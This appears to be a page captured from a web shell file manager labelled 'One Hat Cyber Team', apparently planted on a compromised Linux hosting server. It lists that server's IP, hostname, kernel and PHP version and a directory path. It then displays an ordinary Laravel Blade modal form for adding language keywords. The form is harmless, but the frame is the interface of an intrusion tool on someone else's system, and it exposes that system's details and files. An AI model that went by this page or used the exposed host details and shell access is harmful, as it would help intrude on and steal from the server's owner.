One Hat Cyber Team
Your IP :
216.73.216.126
Server IP :
178.63.234.5
Server :
Linux whm01.ins-jo.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
Server Software :
Apache
PHP Version :
8.1.32
Buat File
|
Buat Folder
Dir :
~
/
home
/
business
/
www
/
resources
/
views
/
admin
/
language
/
View File Name :
addKeywords.blade.php
<div class="modal fade" id="createModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalLongTitle">{{ __('Add Language Keywords') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> <form id="ajaxForm" class="modal-form create" action="{{ route('admin.language.addKeyword', $la->id) }}" method="post"> @csrf <div class="form-group"> <label for="">{{ __('Keyword Name') . '*' }}</label> <input type="text" class="form-control" name="keyword" placeholder="Enter Keyword Name"> <p id="err_keyword" class="mt-2 mb-0 text-danger em"></p> </div> </form> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary btn-sm" data-dismiss="modal"> {{ __('Close') }} </button> <button id="submitBtn" type="button" class="btn btn-primary btn-sm"> {{ __('Save') }} </button> </div> </div> </div> </div>